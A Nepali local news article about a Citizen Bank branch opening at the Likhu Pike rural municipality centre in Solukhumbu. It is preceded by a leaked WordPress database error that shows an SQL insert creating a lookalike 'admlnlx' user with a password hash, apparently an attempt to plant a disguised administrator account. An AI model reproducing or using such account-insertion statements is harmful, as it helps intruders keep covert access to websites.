WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlSGQ5sabcszGvYjFJqlfTwBS5ftt//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 19:52:52', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु-२७, मंसिर । सोलुखुम्बु जिल्लाको लिखुपिके गाउँपालिका केन्द्रमा बैंक स्थापना भएको छ । गाउँपालिकाको केन्द्र चौलाखर्कको काफ्ले चौरमा बुधबार एक कार्यक्रमका बीच सिटिजन बैंकको स्थापना गरिएको हो ।
बैशाखमानै बैक स्थापना भए पनि आर्थिक कारोबार भने बुधबारदेखि मात्र गरेको शाखा प्रबन्धक राम बाबु थापाले जानकारी दिए । बुधबार उद्घाटनको अवसरमा करिब ६० जनाले सेवा लिएको पनि उँपालिकाकी उपाद्याक्ष प्रमिला बस्नेतले जानकारी दिए । बैंक स्थापना भए पछि लामो यात्रा गरी सदरमुकाम सल्लेरी पुगेर बैंकिङ कारोबार गर्नुपर्ने बाध्यता अन्त्य भएको भन्दै स्थानीयबासी खुसी व्यक्त गरेका छन ।
राष्ट्रबैंकले प्रत्येक स्थानीय तहमा निजि या सरकारी बैंक स्थापना गरि सेवा ग्राहिलाई सेवा प्रबाह गर्ने निती लिएको छ । लिखु पिकेको बैक स्थापना सँगै सोलुखुम्बुको स्थानीय तहमा बैंक स्थापना हुने गाउँपालिकाको सङ्ख्या २ वटा पुगेको छ । यस अघि थुलुङदुधकोशी गाउँपालिका केन्द्र मुक्लिमा भदौ ७ गते लक्ष्मी बैंकको शाखा विस्तार गरिएको थियो । अब केहि दिनभित्रै माप्यदुधकोशी गाउँपालिका केन्द्र बासामा र सोताङ गाउबालिका सोताङमा कृषि बिकास बैक स्थापना गर्ने तयारी भाईरहेको साथानिया स्रोतले जानकारी दिए ।